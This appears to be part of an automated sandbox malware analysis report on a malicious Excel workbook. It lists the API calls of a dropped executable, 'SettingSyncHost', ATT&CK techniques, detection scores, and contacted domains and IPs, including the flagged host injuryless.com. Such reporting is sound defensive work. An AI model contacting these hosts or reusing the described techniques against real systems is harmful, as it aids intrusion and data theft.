    Source: C:\Users\Public\SettingSyncHostCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,5_2_00398C12
    Source: C:\Users\Public\SettingSyncHostCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,5_2_003A1C0F
    Source: C:\Users\Public\SettingSyncHostCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,5_2_0039AD33
    Source: C:\Users\Public\SettingSyncHostCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,5_2_003EDD0D
    Source: C:\Users\Public\SettingSyncHostCode function: GetLocaleInfoA,___ascii_strnicmp,__tolower_l,__tolower_l,5_2_003A2D8A
    Source: C:\Users\Public\SettingSyncHostCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,5_2_0039ADDA
    Source: C:\Users\Public\SettingSyncHostCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,5_2_0039AE35
    Source: C:\Users\Public\SettingSyncHostCode function: GetLocaleInfoA,5_2_003A2EBF
    Source: C:\Users\Public\SettingSyncHostCode function: EnumSystemLocalesW,5_2_003EDFAF
    Source: C:\Users\Public\SettingSyncHostCode function: EnumSystemLocalesW,5_2_003EDFFA
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003930E0 GetLocalTime,@_RTC_CheckStackVars@8,5_2_003930E0
    Source: C:\Users\Public\SettingSyncHostCode function: 5_2_003CBF90 SHGetFolderPathA,GetUserNameA,GetComputerNameExA,5_2_003CBF90

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management Instrumentation21Application Shimming1Application Shimming1Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScripting1Boot or Logon Initialization ScriptsProcess Injection2Deobfuscate/Decode Files or Information1LSASS MemoryAccount Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsNative API1Logon Script (Windows)Logon Script (Windows)Scripting1Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsExploitation for Client Execution33Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSSystem Information Discovery24Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCommand and Scripting Interpreter2Network Logon ScriptNetwork Logon ScriptMasquerading121LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection2Cached Domain CredentialsSecurity Software Discovery121VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Network Configuration Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Current-Status-062021-81197.xlsb8%VirustotalBrowse
    Current-Status-062021-81197.xlsb2%ReversingLabs

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\logo[1].png100%Joe Sandbox ML
    C:\Users\Public\SettingSyncHost100%Joe Sandbox ML
    C:\Users\Public\SettingSyncHost17%ReversingLabs
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\logo[1].png17%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    injuryless.com8%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://injuryless.com/?id=124406_ECF4BBEA1588/30%Avira URL Cloudsafe
    https://injuryless.com/?id=124406_ECF4BBEA1588z20%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
    http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
    http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    http://cps.letsencrypt.org00%URL Reputationsafe
    http://cps.letsencrypt.org00%URL Reputationsafe
    http://cps.letsencrypt.org00%URL Reputationsafe
    https://injuryless.com/rosoft0%Avira URL Cloudsafe
    https://injuryless.com/?id=124406_ECF4BBEA1588I30%Avira URL Cloudsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://injuryless.com/?id=124406_ECF4BBEA1588.0%Avira URL Cloudsafe
    https://injuryless.com/?id=124406_ECF4BBEA158810%Avira URL Cloudsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://injuryless.com/?id=124406_ECF4BBEA158870%Avira URL Cloudsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://injuryless.com/0%Avira URL Cloudsafe
    https://injuryless.com/?id=124406_ECF4BBEA15880%Avira URL Cloudsafe
    https://injuryless.com/?id=124406_ECF4BBEA1588G0%Avira URL Cloudsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://injuryless.com/icies0%Avira URL Cloudsafe
    https://injuryless.com/11.10.3.41.3.6.1.4.1.311.10.3.120%Avira URL Cloudsafe
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://injuryless.com/?id=124406_ECF4BBEA1588Z0%Avira URL Cloudsafe
    https://injuryless.com/id=124406_ECF4BBEA1588p0%Avira URL Cloudsafe
    https://injuryless.com/X0%Avira URL Cloudsafe
    https://injuryless.com/id=124406_ECF4BBEA15880%Avira URL Cloudsafe
    http://r3.i.lencr.org/00%URL Reputationsafe
    http://r3.i.lencr.org/00%URL Reputationsafe
    http://r3.i.lencr.org/00%URL Reputationsafe
    https://injuryless.com/?id=124406_ECF4BBEA1588m0%Avira URL Cloudsafe
    http://x1.c.lencr.org/00%URL Reputationsafe
    http://x1.c.lencr.org/00%URL Reputationsafe
    http://x1.c.lencr.org/00%URL Reputationsafe
    http://x1.i.lencr.org/00%URL Reputationsafe
    http://x1.i.lencr.org/00%URL Reputationsafe
    http://x1.i.lencr.org/00%URL Reputationsafe
    https://injuryless.com/?id=124406_ECF4BBEA1588m20%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    injuryless.com
    		193.178.169.243
    		truetrueunknown
    pigeonious.com
    		95.142.44.93
    		truefalse
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://api.diagnosticssdf.office.com091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
        		high
        https://login.microsoftonline.com/091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
          		high
          https://shell.suite.office.com:1443091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
            		high
            https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
              		high
              https://autodiscover-s.outlook.com/091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                		high
                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                  		high
                  https://cdn.entity.091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://api.addins.omex.office.net/appinfo/query091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                    		high
                    https://clients.config.office.net/user/v1.0/tenantassociationkey091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                      		high
                      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                        		high
                        https://powerlift.acompli.net091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://rpsticket.partnerservices.getmicrosoftkey.com091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://lookup.onenote.com/lookup/geolocation/v1091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                          		high
                          https://cortana.ai091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                            		high
                            https://cloudfiles.onenote.com/upload.aspx091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                              		high
                              https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                		high
                                https://entitlement.diagnosticssdf.office.com091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                  		high
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                    		high
                                    https://api.aadrm.com/091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://ofcrecsvcapi-int.azurewebsites.net/091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                      		high
                                      https://api.microsoftstream.com/api/091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                        		high
                                        https://injuryless.com/?id=124406_ECF4BBEA1588/3SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                          		high
                                          https://cr.office.com091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                            		high
                                            https://portal.office.com/account/?ref=ClientMeControl091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                              		high
                                              https://injuryless.com/?id=124406_ECF4BBEA1588z2SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://graph.ppe.windows.net091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                		high
                                                https://res.getmicrosoftkey.com/api/redemptionevents091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                https://powerlift-frontdesk.acompli.net091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                https://tasks.office.com091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                  		high
                                                  http://cps.root-x1.letsencrypt.org0SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://officeci.azurewebsites.net/api/091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/work091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                    		high
                                                    https://store.office.cn/addinstemplate091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://cps.letsencrypt.org0SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://injuryless.com/rosoftSettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://injuryless.com/?id=124406_ECF4BBEA1588I3SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://outlook.office.com/autosuggest/api/v1/init?cvid=091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                      		high
                                                      https://globaldisco.crm.dynamics.com091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                        		high
                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                          		high
                                                          https://store.officeppe.com/addinstemplate091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://dev0-api.acompli.net/autodetect091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://www.odwebp.svc.ms091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://api.powerbi.com/v1.0/myorg/groups091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                            		high
                                                            https://web.microsoftstream.com/video/091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                              		high
                                                              https://graph.windows.net091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                		high
                                                                https://dataservice.o365filtering.com/091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://officesetup.getmicrosoftkey.com091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://analysis.windows.net/powerbi/api091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                  		high
                                                                  https://prod-global-autodetect.acompli.net/autodetect091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.json091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                    		high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                      		high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                        		high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                          		high
                                                                          https://injuryless.com/?id=124406_ECF4BBEA1588.SettingSyncHost, 00000005.00000002.1526534901.0000000000D68000.00000004.00000020.sdmptrue
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://injuryless.com/?id=124406_ECF4BBEA15881SettingSyncHost, 00000005.00000002.1526534901.0000000000D68000.00000004.00000020.sdmptrue
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://ncus.contentsync.091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                            		high
                                                                            https://injuryless.com/?id=124406_ECF4BBEA15887SettingSyncHost, 00000005.00000002.1526534901.0000000000D68000.00000004.00000020.sdmptrue
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                              		high
                                                                              http://weather.service.msn.com/data.aspx091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                		high
                                                                                https://apis.live.net/v5.0/091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://injuryless.com/SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmptrue
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                  		high
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                    		high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                      		high
                                                                                      https://management.azure.com091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                        		high
                                                                                        https://injuryless.com/?id=124406_ECF4BBEA1588SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmp, SettingSyncHost, 00000005.00000002.1526534901.0000000000D68000.00000004.00000020.sdmptrue
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://injuryless.com/?id=124406_ECF4BBEA1588GSettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmptrue
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://wus2.contentsync.091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://incidents.diagnostics.office.com091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                          		high
                                                                                          https://clients.config.office.net/user/v1.0/ios091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                            		high
                                                                                            https://injuryless.com/iciesSettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmptrue
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://insertmedia.bing.office.net/odc/insertmedia091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                              		high
                                                                                              https://injuryless.com/11.10.3.41.3.6.1.4.1.311.10.3.12SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmptrue
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://o365auditrealtimeingestion.manage.office.com091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                                		high
                                                                                                https://outlook.office365.com/api/v1.0/me/Activities091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                                  		high
                                                                                                  https://api.office.net091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                                    		high
                                                                                                    https://incidents.diagnosticssdf.office.com091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                                      		high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policies091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                                        		high
                                                                                                        https://entitlement.diagnostics.office.com091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                                          		high
                                                                                                          https://injuryless.com/?id=124406_ECF4BBEA1588ZSettingSyncHost, 00000005.00000002.1526534901.0000000000D68000.00000004.00000020.sdmptrue
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://injuryless.com/id=124406_ECF4BBEA1588pSettingSyncHost, 00000005.00000002.1526534901.0000000000D68000.00000004.00000020.sdmptrue
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                                            		high
                                                                                                            https://injuryless.com/XSettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmptrue
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://outlook.office.com/091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                                              		high
                                                                                                              https://storage.live.com/clientlogs/uploadlocation091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                                                		high
                                                                                                                https://injuryless.com/id=124406_ECF4BBEA1588SettingSyncHost, 00000005.00000002.1526534901.0000000000D68000.00000004.00000020.sdmptrue
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://r3.i.lencr.org/0SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://templatelogging.office.com/client/log091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                                                  		high
                                                                                                                  https://outlook.office365.com/091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                                                    		high
                                                                                                                    https://webshell.suite.office.com091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                                                      		high
                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                                                        		high
                                                                                                                        https://injuryless.com/?id=124406_ECF4BBEA1588mSettingSyncHost, 00000005.00000002.1526534901.0000000000D68000.00000004.00000020.sdmptrue
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://x1.c.lencr.org/0SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://x1.i.lencr.org/0SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        https://injuryless.com/?id=124406_ECF4BBEA1588m2SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmptrue
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown

                                                                                                                        Contacted IPs

                                                                                                                        • No. of IPs < 25%
                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                        • 75% < No. of IPs

                                                                                                                        Public

                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                        193.178.169.243
                                                                                                                        		injuryless.comunknown
                                                                                                                        		48282VDSINA-ASRUtrue
                                                                                                                        95.142.44.93
                                                                                                                        		pigeonious.comRussian Federation
                                                                                                                        		210079EUROBYTEEurobyteLLCMoscowRussiaRUfalse

